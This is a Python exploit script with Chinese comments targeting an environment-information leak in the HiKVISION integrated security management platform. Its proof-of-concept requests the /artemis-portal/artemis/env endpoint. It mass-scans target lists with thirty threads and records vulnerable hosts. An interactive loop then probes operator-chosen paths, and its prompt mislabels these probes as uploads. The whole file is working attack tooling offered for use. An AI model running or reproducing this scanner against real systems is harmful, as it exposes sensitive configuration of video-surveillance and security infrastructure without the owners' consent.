#导包
import requests,argparse,sys,time,re,os,json
from multiprocessing.dummy import Pool
#关闭警告
requests.packages.urllib3.disable_warnings()
def banner():
    test="""
    __  ___ __ ___    ___________ ________  _   __     _______   ___    __
   / / / (_) //_/ |  / /  _/ ___//  _/ __ \/ | / /    / ____/ | / / |  / /
  / /_/ / / ,<  | | / // / \__ \ / // / / /  |/ /    / __/ /  |/ /| | / / 
 / __  / / /| | | |/ // / ___/ // // /_/ / /|  /    / /___/ /|  / | |/ /  
/_/ /_/_/_/ |_| |___/___//____/___/\____/_/ |_/____/_____/_/ |_/  |___/   
                                             /_____/                      
"""
    print(test)
def main():
    # 处理命令参数
    banner()
    parser = argparse.ArgumentParser(description='HiKVISION综合安防管理平台env信息泄漏')
    parser.add_argument('-u','--url',dest='url',type=str,help='Please input a url')
    parser.add_argument('-f','--file',dest='file',type=str,help='Please input a file')
    args = parser.parse_args()
    if args.url and not args.file:
        if poc(args.url):
            exp(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8') as fb:
            for url in fb.readlines():
                url_list.append(url.strip())
        mp = Pool(30)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")
def poc(target):
    payload = '/artemis-portal/artemis/env'
    header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
    }
    proxies={
        'http':'http://127.0.0.1:8080',
        'https':'http://127.0.0.1:8080'
    }
    try:
        res = requests.get(url=target+payload,headers=header,proxies=proxies,timeout=15,verify=False)
        #print(res.text)
        res1 = json.loads(res.text)
        #print(res1['profiles'])
        if 'prod' in res1['profiles']:
            #print(f'[+]{target} have loopholes {target+payload}')
            with open('result.txt','a',encoding='utf-8') as fn:
                fn.write(target.strip()+'\n')
                return True
    except:
        pass

def exp(target):
    
    headers={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
    }
    proxies={
        'http':'http://127.0.0.1:8080',
        'https':'https://127.0.0.1:8080'
    }
    print('正在进行中...')
    time.sleep(2)
    os.system('cls')
    while True:
        path = input('请输入你要上传到文件路径')
        api_payload=f'/artemis-portal/artemis/{path}'
        if path =='q':
            exit()
        try:
            res = requests.get(url=target+api_payload,headers=headers,proxies=proxies,timeout=15,verify=False)
            #print(res.status_code)
            if res.status_code == 200:
                print(f'[+]{target} 存在漏洞，访问路径为：{target}+{api_payload}')
        except:
            print('上传失败')

if __name__ == "__main__":
    main()
